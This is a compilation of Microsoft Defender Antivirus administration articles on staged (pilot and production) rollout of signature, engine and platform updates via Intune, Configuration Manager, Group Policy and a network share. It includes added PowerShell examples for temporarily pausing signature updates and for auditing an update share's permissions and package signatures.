For details on how to use these tools, see Create a custom gradual rollout process for
Microsoft Defender updates.

Customers that prioritize availability over security should take a crawl, walk, run approach.

Deployment scenarios
Ring deployment using Intune and Microsoft Update
Ring deployment using System Center Configuration Manager and Windows
Server Update Services (WSUS)
Ring deployment using Group Policy and Microsoft Update
Ring deployment using Group Policy and network share
Ring deployment using Group Policy and Windows Server Update Services
Pilot ring deployment using Group Policy and Windows Server Update Services
Production ring deployment using Group Policy and Windows Server Update
Services



Microsoft Defender Antivirus ring
deployment using Intune and direct
internet access for Microsoft Update
Article • 12/01/2023

Applies to:

Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR
Microsoft Defender Antivirus

Platforms

Windows
Windows Server

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Microsoft Defender for Endpoint is an enterprise endpoint security platform designed to
help enterprise networks prevent, detect, investigate, and respond to advanced threats.

Tip

Microsoft Defender for Endpoint is available in two plans, Defender for Endpoint Plan 1 and Plan 2. A new Microsoft Defender Vulnerability Management add-on is now available for Plan 2.

Setting up the pilot environment

This section describes the process for setting up the pilot UAT / Test / QA environment.

Target about 10-500* Windows and/or Windows Server systems, depending on how many systems you have in total.

In the Intune portal https://endpoint.microsoft.com , create or append to your Microsoft Defender Antivirus policy with the following settings (for example, in a pilot policy named MDAV_Settings_Pilot). If you have a Citrix environment, include at least one Citrix VM (non-persistent and/or persistent).

Note

Security intelligence update (SIU) is equivalent to signature updates, which is the same as definition updates.

Recommended settings are as follows:

Feature | Recommendation
Engine Updates Channel | Beta Channel
Platform Updates Channel | Beta Channel
Security Intelligence Updates Channel | Current Channel (Staged)

References
Antivirus profiles - Devices managed by Microsoft Intune
Use Endpoint security Antivirus policy to manage Microsoft Defender update
behavior
Manage the gradual rollout process for Microsoft Defender updates

Setting up the Production environment

In the Intune portal https://endpoint.microsoft.com , create or append to your Microsoft Defender Antivirus policy with the following settings (for example, in a production policy named MDAV_Settings_Production).

Feature | Recommendation | Comments
Engine Updates Channel | Critical – Time delay | It's delayed by two days.
Platform Updates Channel | Critical – Time delay | It's delayed by two days.
Security Intelligence Updates Channel | Current Channel (Broad) | This configuration provides you with 3 hours of time to find an FP and prevent the production systems from getting an incompatible signature update.

If you encounter problems

If you encounter problems with your deployment, change the source of the Microsoft Defender Antivirus updates:

1. In the Intune portal https://endpoint.microsoft.com , go to Endpoint Security, select Antivirus, and then find your Intune production policy (for example, MDAV_Settings_Production), and then, in Configuration settings, select Edit.

2. Change the entry to FileShares. This change is shown in the following figure.

What this change does

It forces Microsoft Defender Antivirus to look for the Security Intelligence Update, Engine Update or Platform Update from a file share that doesn't exist.

How long does it take for the Intune policy to refresh?

If you update a policy, the change reaches the device within a few minutes (3-5 minutes) via WNS, as long as the WNS URLs are open.

Reference: Intune actions that immediately send a notification to a device

After the issue is resolved, set the "Signature Update Fallback Order" back to the original setting:

InternalDefinitionUpdateServer|MicrosoftUpdateServer|MMPC|FileShares

See also
Microsoft Defender Antivirus ring deployment



Microsoft Defender Antivirus ring
deployment using System Center
Configuration Manager and Windows
Server Update Services
Article • 08/02/2023

Applies to:

Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR
Microsoft Defender Antivirus

Platforms

Windows
Windows Server

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Microsoft Defender for Endpoint is an enterprise endpoint security platform designed to
help enterprise networks prevent, detect, investigate, and respond to advanced threats.

Tip

Microsoft Defender for Endpoint is available in two plans, Defender for Endpoint Plan 1 and Plan 2. A new Microsoft Defender Vulnerability Management add-on is now available for Plan 2.

Setting up the pilot environment

This section describes the process for setting up the pilot UAT / Test / QA environment.

Note

Security intelligence update (SIU) is equivalent to signature updates, which is the same as definition updates.

Target about 10-500 Windows and/or Windows Server systems, depending on how many systems you have in total.

Note

If you have a Citrix environment, include at least 1 Citrix VM (non-persistent and/or persistent).

1. In System Center Configuration Manager > Create Automatic Deployment Rule Wizard > General page, in Specify the setting for this automatic deployment rule, make the following settings:

   In | Change
   Name | Type a name for your deployment rule. For example, type MDE-MDAV_Security_Intelligence_Update_Pilot
   Description | Type a brief description for your pilot
   Template | Select SCEP and Windows Defender Antivirus Updates
   Collection | Type Windows_Security_Intelligence_Pilot
   Each time the rule runs and finds new updates | Select Create a new Software Update Group
   Each time the rule runs and finds new updates | Select Enable the deployment after this rule is run

2. Select Next. On the Deployment Settings page, under Specify the settings for this Automatic Deployment Rule, do the following:

   In | Change
   Type of deployment | Select Required
   Detail level | Select Only error messages
   Some software updates include a license agreement | Select Automatically deploy all software updates found by this rule, and approve any license agreements.

3. Select Next. On the Software Updates page, under Select the property filters and search criteria, make the following settings:

   In | Change
   Property filters | Select Article ID and Date Released or Revised
   Search Criteria | Enter the following:
     Article ID = 2267602
     Date Released or Revised = Last 1 month
     Product = Windows Defender
     Superseded = No
     Update Classification = "Critical Updates" OR "Definition Updates"

These settings are shown in the following image:


Tip

Click Preview to make sure "Security Intelligence Update for Windows Defender Antivirus" is listed. You should see KB2267602.

Note

Date Released or Revised: Last 1 month - If your WSUS/SUP have been healthy, you may want to set this to "Last 1 week".

Product: "Windows Defender" - We are removing "System Center Endpoint Protection", because we want to target this to only the operating systems that have Microsoft Defender Antivirus.

Update Classification: "Critical Updates" and "Definition Updates"

4. Select Next. On the Evaluation Schedule page, under Specify the recurring schedule for this rule, select Run the rule on a schedule, and then select Customize.

5. On the Deployment Schedule page, under Configure schedule details for this deployment, do the following:

   In | Change
   Schedule evaluation > Time based on | Select UTC
   Software available time | Select As soon as possible
   Installation deadline | Select As soon as possible

6. Select Next. On the User Experience page, under Specify the user experience for this deployment, ensure the following are selected:

   In | Change
   User visual experience > User notifications | Select Hide in Software center and all notifications
   Deadline behavior | Select Software Update Installation
   Device restart behavior | Select Servers
   Write filter handling for Windows Embedded devices | Select Commit changes at deadline or during a maintenance window (requires restarts)

7. Select Next. On the Alerts page, under Specify software update alert options for
this deployment, select Generate an alert when this Rule fails, and then select
Next.

8. On the top-level Deployment Package page, under Select deployment package for this automatic deployment rule, select Create a new deployment package, and then do the following:

   In | Change
   Name | Type a name for your new deployment package. For example, type MDE-MDAV Security Intelligence Update.
   Description | Type a brief description for your new deployment package
   Package Source (Example) | Type the path to your package source. For example, type \\server_name\folder_path\sccm\deployment\MDE-MDAV_Security_Intelligence_Updates_Pilot, or select Browse to navigate to and select your package source.
   Sending priority | Select High and select Enable binary differential replication

9. Select Next. On the Distribution point page, under Specify the distribution points
or distribution point groups to host the content, select Add and then specify your
distribution point or distribution point groups.

10. Select Next. On the Distribution location page, under Specify download location
for this Automatic Deployment Rule, select Download software updates from the
Internet, and then select Next.

11. On the Distribution location page, under Specify the update languages for
product, under product, select Windows Update.

12. Select Next. On the Download Settings page, under Specify the software updates download behavior for clients on slow site boundaries, select the following:

   In | Change
   Name | In Deployment options, select Download software updates from distribution point and install
   Deployment options | Select Download and install software updates from the distribution points in site default boundary group
   Deployment options | If "Prefer cloud based sources over on-premises sources" is configured in the boundary group settings, Microsoft Update will be the preferred source.

13. Select Next. On the Summary page, under Confirm the settings, review the
settings. Example settings are shown in the following figure.

14. Select Next. Wait until the process completes and the Completion page opens.
Select Close to finish the process. Automatic Deployment rules are saved, and can
be managed from the location shown in the following figure:

Setting up the production environment

1. In the System Center Configuration Manager > Create Automatic Deployment Rule Wizard > General page, in Specify the setting for this automatic deployment rule, make the following settings:

   In | Change
   Name | Type a name for your deployment rule. For example, type MDE-MDAV_Security_Intelligence_Update_Production
   Description | Type a brief description for your deployment rule
   Template | Select SCEP and Windows Defender Antivirus Updates
   Collection | Type Windows_Security_Intelligence_Production
   Each time the rule runs and finds new updates | Select Add to an existing Software Update Group
   Each time the rule runs and finds new updates | Select Enable the deployment after this rule is run

2. Select Next. On the Deployment Settings page, under Specify the settings for this Automatic Deployment Rule, do the following:

   In | Change
   Type of deployment | Select Required
   Detail level | Select Only error messages
   Some software updates include a license agreement | Select Automatically deploy all software updates found by this rule, and approve any license agreements.

3. Select Next. On the Software Updates page, under Select the property filters and search criteria, enter the following:

   In | Change
   Property filters | Select Product and Update Classification
   Search Criteria | Enter the following product and update classifications:
     Article ID = 2267602
     Date Released or Revised = Last 1 month
     Product = Windows Defender
     Superseded = No
     Update Classification = Critical Updates OR Definition Updates

Tip

Click Preview to make sure "Security Intelligence Update for Windows Defender Antivirus" is listed. You should see KB2267602.

Note

Date Released or Revised: Last 1 month - If your WSUS/SUP have been healthy, you may want to set this to Last 1 week.

Product: "Windows Defender" - We are removing "System Center Endpoint Protection", because we want to target this to only the operating systems that have Microsoft Defender Antivirus.

Update Classification: "Critical Updates" and "Definition Updates"

4. Select Next. On the Evaluation Schedule page, under Specify the recurring schedule for this rule, select Run the rule on a schedule, and then select Customize.

5. On the Deployment Schedule page, under Configure schedule details for this deployment, do the following:

   In | Change
   Schedule evaluation > Time based on | Select UTC
   Software available time | Select As soon as possible
   Installation deadline | Select As soon as possible

6. Select Next. On the User Experience page, under Specify the user experience for this deployment, ensure the following are selected:

   In | Change
   User visual experience > User notifications | Select Hide in Software center and all notifications
   Deadline behavior | Select Software Update Installation
   Device restart behavior | Select Servers
   Write filter handling for Windows Embedded devices | Select Commit changes at deadline or during a maintenance window (requires restarts)

7. Select Next. On the Alerts page, under Specify software update alert options for
this deployment, select Generate an alert when this Rule fails, select Browse,
navigate to, and select the deployment package and then select Next.

8. On the top-level Deployment Package page, under Select deployment package for this automatic deployment rule, select Select a deployment package.

9. On the Download Location page, under Specify download location for this
Automatic Deployment Rule, select Download software updates from the
Internet, and then select Next.

10. On the Language Selection page, under Specify the update languages for
product, under Product, specify the necessary Product and Update languages.

11. Select Next. On the Download Settings page, under Specify the software updates download behavior for clients on slow site boundaries, select the following:

   In | Change
   Deployment options | Select Download software updates from distribution point and install
   Deployment options | Select Download and install software updates from the distribution points in site default boundary group
   Deployment options | If "Prefer cloud based sources over on-premises sources" is configured in the boundary group settings, Microsoft Update will be the preferred source.

12. Select Next. On the Summary page, under Confirm the settings, review the
settings. Example settings are shown in the following figure:

13. Select Next. Wait until the process completes and the Completion page opens.
Select Close to finish the process.

If you encounter problems

1. Navigate to Software Library.

2. Under Software Updates, select Automatic Deployment Rules, right-click MDE-MDAV_Security_Intelligence_Update_Production, and then select Disable. This setting is shown in the following figure:

See also
Microsoft Defender for Endpoint ring deployment



Microsoft Defender Antivirus
production ring deployment using
Group Policy and Microsoft Updates
Article • 08/02/2023

Applies to:

Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR
Microsoft Defender Antivirus

Platforms

Windows
Windows Server

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Microsoft Defender for Endpoint is an enterprise endpoint security platform designed to
help enterprise networks prevent, detect, investigate, and respond to advanced threats.

Tip

Microsoft Defender for Endpoint is available in two plans, Defender for Endpoint Plan 1 and Plan 2. A new Microsoft Defender Vulnerability Management add-on is now available for Plan 2.

Prerequisites
Review the README at https://github.com/microsoft/defender-updatecontrols/blob/main/README.md

Download the latest Windows Defender .admx and .adml

WindowsDefender.admx
WindowsDefender.adml

Copy the latest .admx and .adml to the Domain Controller Central Store.

Setting up the Pilot (UAT/Test/QA) environment

This section describes the process for setting up the pilot UAT / Test / QA environment.

Note

Security intelligence update (SIU) is equivalent to signature updates, which is the same as definition updates.

On about 10-500 Windows and/or Windows Server systems, depending on how many systems you have in total, perform the following tasks.

Note

If you have a Citrix environment, include at least 1 Citrix VM (non-persistent and/or persistent).

In Group Policy Management Console (GPMC, GPMC.msc), create or append to your Microsoft Defender Antivirus policy.

1. Edit your Microsoft Defender Antivirus policy. For example, edit MDAV_Settings_Pilot. Go to Computer Configuration > Policies > Administrative Templates > Windows Components > Microsoft Defender Antivirus. There are three related options:

   Feature | Recommendation for the pilot systems
   Select the channel for Microsoft Defender daily Security Intelligence updates | Current Channel (Staged)
   Select the channel for Microsoft Defender monthly Engine updates | Beta Channel
   Select the channel for Microsoft Defender monthly Platform updates | Beta Channel

   The three options are shown in the following figure.

   For more information, see Manage the gradual rollout process for Microsoft Defender updates.

2. Go to Computer Configuration > Policies > Administrative Templates > Windows Components > Microsoft Defender Antivirus.

3. For intelligence updates, double-click Select the channel for Microsoft Defender
monthly intelligence updates.

4. On the Select the channel for Microsoft Defender monthly intelligence updates
page, select Enabled, and in Options, select Current Channel (Staged).

5. Select Apply, and then select OK.

6. Go to Computer Configuration > Policies > Administrative Templates > Windows Components > Microsoft Defender Antivirus.

7. For engine updates, double-click Select the channel for Microsoft Defender
monthly engine updates.

8. On the Select the channel for Microsoft Defender monthly Platform updates
page, select Enabled, and in Options, select Beta Channel.

9. Select Apply, and then select OK.

10. For platform updates, double-click Select the channel for Microsoft Defender
monthly Platform updates.

11. On the Select the channel for Microsoft Defender monthly Platform updates
page, select Enabled, and in Options, select Beta Channel. These two settings are
shown in the following figure:

12. Select Apply, and then select OK.

Related articles
Antivirus profiles - Devices managed by Microsoft Intune
Use Endpoint security Antivirus policy to manage Microsoft Defender update
behavior (Preview)
Manage the gradual rollout process for Microsoft Defender updates

Setting up the production environment

1. In Group Policy Management Console (GPMC, GPMC.msc), go to Computer Configuration > Policies > Administrative Templates > Windows Components > Microsoft Defender Antivirus.

2. Set the three policies as follows:

   Feature | Recommendation for the production systems | Remarks
   Select the channel for Microsoft Defender daily Security Intelligence updates | Current Channel (Broad) | This setting provides you with 3 hours of time to find an FP and prevent the production systems from getting an incompatible signature update.
   Select the channel for Microsoft Defender monthly Engine updates | Critical – Time delay | Updates are delayed by two days.
   Select the channel for Microsoft Defender monthly Platform updates | Critical – Time delay | Updates are delayed by two days.

3. For intelligence updates, double-click Select the channel for Microsoft Defender
monthly intelligence updates.

4. On the Select the channel for Microsoft Defender monthly intelligence updates
page, select Enabled, and in Options, select Current Channel (Broad).

5. Select Apply, and then select OK.


6. For engine updates, double-click Select the channel for Microsoft Defender
monthly engine updates.

7. On the Select the channel for Microsoft Defender monthly Platform updates
page, select Enabled, and in Options, select Critical – Time delay.

8. Select Apply, and then select OK.

9. For platform updates, double-click Select the channel for Microsoft Defender
monthly Platform updates.

10. On the Select the channel for Microsoft Defender monthly Platform updates
page, select Enabled, and in Options, select Critical – Time delay.

11. Select Apply, and then select OK.

If you encounter problems

If you encounter problems with your deployment, create or append to your Microsoft Defender Antivirus policy:

1. In Group Policy Management Console (GPMC, GPMC.msc), create or append to your Microsoft Defender Antivirus policy using the following setting:

   Go to Computer Configuration > Policies > Administrative Templates > Windows Components > Microsoft Defender Antivirus > (administrator-defined) PolicySettingName. For example, MDAV_Settings_Production, right-click, and then select Edit. Edit for MDAV_Settings_Production is shown in the following figure:

2. Select Define the order of sources for downloading security intelligence updates.

3. Select the radio button named Enabled.

4. Under Options:, change the entry to FileShares, select Apply, and then select OK. This change is shown in the following figure:

5. Select Define the order of sources for downloading security intelligence updates.

6. Select the radio button named Disabled, select Apply, and then select OK. The disabled option is shown in the following figure:

7. The change is active when Group Policy updates. There are two methods to refresh Group Policy:

   From the command line, run the Group Policy update command. For example, run gpupdate /force. For more information, see gpupdate.
   Wait for Group Policy to automatically refresh. Group Policy refreshes every 90 minutes +/- 30 minutes.

   If you have multiple forests/domains, force replication or wait 10-15 minutes. Then force a Group Policy Update from the Group Policy Management Console.

   Right-click an organizational unit (OU) that contains the machines (for example, Desktops), and select Group Policy Update. This UI command is the equivalent of running gpupdate.exe /force on every machine in that OU. The feature to force Group Policy to refresh is shown in the following figure:

8. After the issue is resolved, set the Signature Update Fallback Order back to the original setting: InternalDefinitionUpdateServer|MicrosoftUpdateServer|MMPC|FileShares.
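The emergency step above (point the fallback order at a FileShares source that has nothing behind it, then restore the original order once the problem is fixed) can also be scripted with Set-MpPreference, which serves both this article and the Intune article's "If you encounter problems" section. This is an added example, not the article's own procedure; the function names and the backup file location are this example's assumptions, and SignatureFallbackOrder, Update-MpSignature and Get-MpComputerStatus are the standard Defender cmdlet surface.

```powershell
# Added example (not from the Microsoft article): the emergency step above, performed
# with Set-MpPreference instead of the Group Policy editor. Pointing the fallback order
# at FileShares alone, with no share defined, means the device fetches no further
# security intelligence until the order is restored. Function names and the backup
# file location are this example's own assumptions.

$DefaultFallbackOrder = 'InternalDefinitionUpdateServer|MicrosoftUpdateServer|MMPC|FileShares'
$BackupFile = Join-Path $env:ProgramData 'MDAV-fallback-order.bak'   # assumed path

function Get-DefenderSignatureState {
    # One-line view of where updates come from and how old the current signatures are.
    $pref   = Get-MpPreference
    $status = Get-MpComputerStatus
    [pscustomobject]@{
        Computer         = $env:COMPUTERNAME
        FallbackOrder    = $pref.SignatureFallbackOrder
        UpdatesSuspended = ($pref.SignatureFallbackOrder -eq 'FileShares')
        SignatureVersion = $status.AntivirusSignatureVersion
        SignatureAgeH    = [math]::Round(((Get-Date) - $status.AntivirusSignatureLastUpdated).TotalHours, 1)
    }
}

function Suspend-DefenderSignatureUpdates {
    # Record the order configured right now, so Resume returns to the real previous
    # state rather than to the documented default.
    $current = (Get-MpPreference).SignatureFallbackOrder
    if ([string]::IsNullOrWhiteSpace($current)) { $current = $DefaultFallbackOrder }
    Set-Content -Path $BackupFile -Value $current -Force

    # FileShares only: with no SignatureDefinitionUpdateFileSharesSources defined,
    # the lookup has nowhere to go and the device keeps its current signatures.
    Set-MpPreference -SignatureFallbackOrder 'FileShares'
    Get-DefenderSignatureState
}

function Resume-DefenderSignatureUpdates {
    $previous = $DefaultFallbackOrder
    if (Test-Path $BackupFile) { $previous = (Get-Content $BackupFile -Raw).Trim() }

    Set-MpPreference -SignatureFallbackOrder $previous
    Remove-Item $BackupFile -ErrorAction SilentlyContinue

    # Fetch the update that was withheld while the order pointed at FileShares.
    Update-MpSignature
    Get-DefenderSignatureState
}

# Stop the production ring from taking new signatures while the FP is investigated ...
Suspend-DefenderSignatureUpdates
# ... and put the original order back once the fix is confirmed.
Resume-DefenderSignatureUpdates
```

SignatureAgeH growing while UpdatesSuspended is True is the expected signal that the hold is in effect; after Resume it should drop back to a few hours.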

See also
Antivirus profiles - Devices managed by Microsoft Intune
Use Endpoint security Antivirus policy to manage Microsoft Defender update
behavior (Preview)
Manage the gradual rollout process for Microsoft Defender updates
Microsoft Defender Antivirus ring deployment overview

Microsoft Defender Antivirus
production ring deployment using
Group Policy and network share
Article • 08/02/2023

Applies to:

Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR
Microsoft Defender Antivirus

Platforms

Windows
Windows Server

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Microsoft Defender for Endpoint is an enterprise endpoint security platform designed to
help enterprise networks prevent, detect, investigate, and respond to advanced threats.

Tip

Microsoft Defender for Endpoint is available in two plans, Defender for Endpoint Plan 1 and Plan 2. A new Microsoft Defender Vulnerability Management add-on is now available for Plan 2.

Introduction
This article describes how to deploy Microsoft Defender Antivirus in rings using Group
Policy and Network share (also known as UNC path, SMB, CIFS).

Prerequisites
Review the read me article at Readme

1. Download the latest Windows Defender .admx and .adml.

WindowsDefender.admx
WindowsDefender.adml

2. Copy the latest .admx and .adml to the Domain Controller Central Store.

3. Create a UNC share for security intelligence and platform updates

Setting up the pilot environment

This section describes the process for setting up the pilot UAT / Test / QA environment. Target about 10-500* Windows and/or Windows Server systems, depending on how many systems you have in total.

Note

Security intelligence update (SIU) is equivalent to signature updates, which is the same as definition updates.

Create a UNC share for security intelligence and platform updates
Set up a network file share (UNC/mapped drive) to download security intelligence and
platform updates from the MMPC site by using a scheduled task.

1. On the system on which you want to provision the share and download the
updates, create a folder to which you will save the script.

Console
Start, CMD (Run as admin)
MD C:\Tool\PS-Scripts\

2. Create the folder to which you will save the signature updates.

Console

MD C:\Temp\TempSigs\x64
MD C:\Temp\TempSigs\x86

3. Set up a PowerShell script, CopySignatures.ps1, that copies the downloaded packages to the server that hosts the share. Replace the server and folder names with your own; the UNC paths need the leading double backslash.

PowerShell

# Copy the downloaded update packages (including the x64 and x86 subfolders) to the target share.
Copy-Item -Path "\\SourceServer\SourceFolder" -Destination "\\TargetServer\TargetFolder" -Recurse -Force

4. Use the command line to set up the scheduled tasks. Create one task per architecture and update type (four tasks in all).

Note

There are two types of updates: full and delta.

For x64 delta:

PowerShell (Run as admin)

cd C:\Tool\PS-Scripts\
.\SignatureDownloadCustomTask.ps1 -action create -arch x64 -isDelta $true -destDir C:\Temp\TempSigs\x64 -scriptPath C:\Tool\PS-Scripts\SignatureDownloadCustomTask.ps1 -daysInterval 1

For x64 full:

PowerShell (Run as admin)

cd C:\Tool\PS-Scripts\
.\SignatureDownloadCustomTask.ps1 -action create -arch x64 -isDelta $false -destDir C:\Temp\TempSigs\x64 -scriptPath C:\Tool\PS-Scripts\SignatureDownloadCustomTask.ps1 -daysInterval 1

For x86 delta:

PowerShell (Run as admin)

cd C:\Tool\PS-Scripts\
.\SignatureDownloadCustomTask.ps1 -action create -arch x86 -isDelta $true -destDir C:\Temp\TempSigs\x86 -scriptPath C:\Tool\PS-Scripts\SignatureDownloadCustomTask.ps1 -daysInterval 1

For x86 full:

PowerShell (Run as admin)

cd C:\Tool\PS-Scripts\
.\SignatureDownloadCustomTask.ps1 -action create -arch x86 -isDelta $false -destDir C:\Temp\TempSigs\x86 -scriptPath C:\Tool\PS-Scripts\SignatureDownloadCustomTask.ps1 -daysInterval 1

Note

When the scheduled tasks are created, you can find them in Task Scheduler under Microsoft\Windows\Windows Defender.

5. Run each task manually and verify that you have data ( mpam-d.exe , mpam-fe.exe ,
and nis_full.exe ) in the following folders (you might have chosen different
locations):

C:\Temp\TempSigs\x86

C:\Temp\TempSigs\x64

If the scheduled task fails, run the following commands manually:

Console

C:\windows\system32\windowspowershell\v1.0\powershell.exe -NoProfile -executionpolicy allsigned -command "&\"C:\Tool\PS-Scripts\SignatureDownloadCustomTask.ps1\" -action run -arch x64 -isDelta $False -destDir C:\Temp\TempSigs\x64"

C:\windows\system32\windowspowershell\v1.0\powershell.exe -NoProfile -executionpolicy allsigned -command "&\"C:\Tool\PS-Scripts\SignatureDownloadCustomTask.ps1\" -action run -arch x64 -isDelta $True -destDir C:\Temp\TempSigs\x64"

C:\windows\system32\windowspowershell\v1.0\powershell.exe -NoProfile -executionpolicy allsigned -command "&\"C:\Tool\PS-Scripts\SignatureDownloadCustomTask.ps1\" -action run -arch x86 -isDelta $False -destDir C:\Temp\TempSigs\x86"

C:\windows\system32\windowspowershell\v1.0\powershell.exe -NoProfile -executionpolicy allsigned -command "&\"C:\Tool\PS-Scripts\SignatureDownloadCustomTask.ps1\" -action run -arch x86 -isDelta $True -destDir C:\Temp\TempSigs\x86"

Note

Failures can also be caused by the PowerShell execution policy. The commands above run with -executionpolicy allsigned, which requires the script to carry a valid Authenticode signature; sign the script or adjust the policy deliberately rather than disabling it.

6. Create a share pointing to C:\Temp\TempSigs (for example, \\server\updates).

Note

At a minimum, Authenticated Users (which includes domain computer accounts) must have Read access, on both the share permissions and the NTFS permissions (Security tab). Do not grant broader rights than Read: anything that can write to this share can replace the update packages that every client installs.

7. Set the share location in the policy to the share (for example, \\server\updates).

Note

Do not add the x64 (or x86) folder to the path. The mpcmdrun.exe process adds it automatically.
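Before pointing a policy at the share, check it with a script rather than by eye. The PowerShell below is an added example, not part of the Microsoft article or of the SignatureDownloadCustomTask.ps1 readme: it verifies that the share and NTFS permissions grant no more than Read to broad principals, that each architecture folder holds the three packages named in step 5, that they are fresh, and that each carries a valid Microsoft Authenticode signature. The share name updates, the local path C:\Temp\TempSigs and the 48-hour freshness threshold are assumptions to adjust for your environment.

```powershell
# Added example (not from the Microsoft article): sanity-check the update share
# built in the steps above before pointing production policy at it.
# Assumptions: share 'updates' backed by C:\Temp\TempSigs; expected files are the
# ones the article names (mpam-fe.exe, mpam-d.exe, nis_full.exe). Run elevated on
# the server that hosts the share; needs the built-in SmbShare module.

function Test-DefenderUpdateShare {
    param(
        [Parameter(Mandatory)] [string] $ShareName,      # e.g. 'updates'
        [string]   $LocalPath    = 'C:\Temp\TempSigs',    # folder the share maps to
        [int]      $MaxAgeHours  = 48,                    # assumed freshness threshold
        [string[]] $Archs        = @('x64', 'x86')
    )
    $problems = New-Object System.Collections.Generic.List[string]
    $broad    = 'Authenticated Users|Domain Users|Domain Computers|Everyone'

    # 1. Share-level ACL: readers need Read; nobody broad should have Change/Full.
    #    A writable update share is a supply-chain hole: whoever can write to it can
    #    drop a tampered package that every client then executes.
    $access = Get-SmbShareAccess -Name $ShareName -ErrorAction Stop
    foreach ($ace in $access) {
        if ($ace.AccessControlType -eq 'Allow' -and $ace.AccountName -match $broad -and
            $ace.AccessRight -ne 'Read') {
            $problems.Add("Share ACE too permissive: $($ace.AccountName) has $($ace.AccessRight)")
        }
    }
    $reader = $access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and $_.AccountName -match 'Authenticated Users|Domain Computers'
    }
    if (-not $reader) { $problems.Add('No Read ACE for Authenticated Users or Domain Computers on the share') }

    # 2. NTFS side: same principle; flag Modify/Write/FullControl for broad principals.
    foreach ($rule in (Get-Acl -Path $LocalPath).Access) {
        if ($rule.AccessControlType -eq 'Allow' -and
            $rule.IdentityReference.Value -match $broad -and
            $rule.FileSystemRights.ToString() -match 'Modify|Write|FullControl') {
            $problems.Add("NTFS rule too permissive: $($rule.IdentityReference) has $($rule.FileSystemRights)")
        }
    }

    # 3. Content: each arch folder must hold the three packages, fresh and Microsoft-signed.
    $cutoff = (Get-Date).AddHours(-$MaxAgeHours)
    foreach ($arch in $Archs) {
        $dir = Join-Path $LocalPath $arch
        foreach ($name in 'mpam-fe.exe', 'mpam-d.exe', 'nis_full.exe') {
            $file = Join-Path $dir $name
            if (-not (Test-Path $file)) { $problems.Add("Missing $file"); continue }
            if ((Get-Item $file).LastWriteTime -lt $cutoff) {
                $problems.Add("$file is older than $MaxAgeHours h (is the scheduled task running?)")
            }
            # Authenticode: the package must carry a valid signature from Microsoft.
            $sig = Get-AuthenticodeSignature -FilePath $file
            if ($sig.Status -ne 'Valid' -or $sig.SignerCertificate.Subject -notmatch 'O=Microsoft Corporation') {
                $problems.Add("$file signature check failed: $($sig.Status) / $($sig.SignerCertificate.Subject)")
            }
        }
    }

    [pscustomobject]@{
        Share    = "\\$env:COMPUTERNAME\$ShareName"
        Healthy  = ($problems.Count -eq 0)
        Problems = $problems.ToArray()
    }
}

# Usage (run on the server that hosts the share):
# Test-DefenderUpdateShare -ShareName 'updates' | Format-List
```

Run it from the scheduled task host after the first manual run of the download tasks; a Healthy value of False with a Problems list tells you whether the fault is in permissions, in the download tasks, or in the integrity of what was downloaded.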

Setting up the Pilot (UAT/Test/QA) environment
This section describes how to configure the pilot (UAT/Test/QA) ring of about 10-500 Windows and/or Windows Server systems, depending on how many systems you have in total.

Note

If you have a Citrix environment, include at least one Citrix VM (non-persistent and/or persistent).

In Group Policy Management Console (GPMC, GPMC.msc), create or append to your Microsoft Defender Antivirus policy.

1. Edit your Microsoft Defender Antivirus policy. For example, edit MDAV_Settings_Pilot. Go to Computer Configuration > Policies > Administrative Templates > Windows Components > Microsoft Defender Antivirus. There are three related options, with the recommended value for the pilot systems:

Select the channel for Microsoft Defender daily Security Intelligence updates: Current Channel (Staged)
Select the channel for Microsoft Defender monthly Engine updates: Beta Channel
Select the channel for Microsoft Defender monthly Platform updates: Beta Channel

The three options are shown in the following figure.


For more information, see Manage the gradual rollout process for Microsoft
Defender updates

2. Go to Computer Configuration > Policies > Administrative Templates > Windows Components > Microsoft Defender Antivirus.

3. For security intelligence updates, double-click Select the channel for Microsoft Defender daily Security Intelligence updates.

4. On the Select the channel for Microsoft Defender daily Security Intelligence updates page, select Enabled, and in Options, select Current Channel (Staged).

5. Select Apply, and then select OK.

6. For engine updates, double-click Select the channel for Microsoft Defender monthly Engine updates.

7. On the Select the channel for Microsoft Defender monthly Engine updates page, select Enabled, and in Options, select Beta Channel.

8. Select Apply, and then select OK.

9. For platform updates, double-click Select the channel for Microsoft Defender monthly Platform updates.

10. On the Select the channel for Microsoft Defender monthly Platform updates page, select Enabled, and in Options, select Beta Channel. These two settings are shown in the following figure:

11. Select Apply, and then select OK.

Related articles
Antivirus profiles - Devices managed by Microsoft Intune
Use Endpoint security Antivirus policy to manage Microsoft Defender update
behavior (Preview)
Manage the gradual rollout process for Microsoft Defender updates

Setting up the production environment

1. In Group Policy Management Console (GPMC, GPMC.msc), go to Computer Configuration > Policies > Administrative Templates > Windows Components > Microsoft Defender Antivirus.

2. Set the three policies as follows (recommendation for the production systems, with remarks):

Select the channel for Microsoft Defender daily Security Intelligence updates: Current Channel (Broad)
    This setting gives you 3 hours to find a false positive (FP) and prevent the production systems from getting an incompatible signature update.

Select the channel for Microsoft Defender monthly Engine updates: Critical – Time delay
    Updates are delayed by two days.

Select the channel for Microsoft Defender monthly Platform updates: Critical – Time delay
    Updates are delayed by two days.

3. For security intelligence updates, double-click Select the channel for Microsoft Defender daily Security Intelligence updates.

4. On the Select the channel for Microsoft Defender daily Security Intelligence updates page, select Enabled, and in Options, select Current Channel (Broad).

5. Select Apply, and then select OK.

6. For engine updates, double-click Select the channel for Microsoft Defender monthly Engine updates.

7. On the Select the channel for Microsoft Defender monthly Engine updates page, select Enabled, and in Options, select Critical – Time delay.

8. Select Apply, and then select OK.

9. For platform updates, double-click Select the channel for Microsoft Defender monthly Platform updates.

10. On the Select the channel for Microsoft Defender monthly Platform updates page, select Enabled, and in Options, select Critical – Time delay.

11. Select Apply, and then select OK.
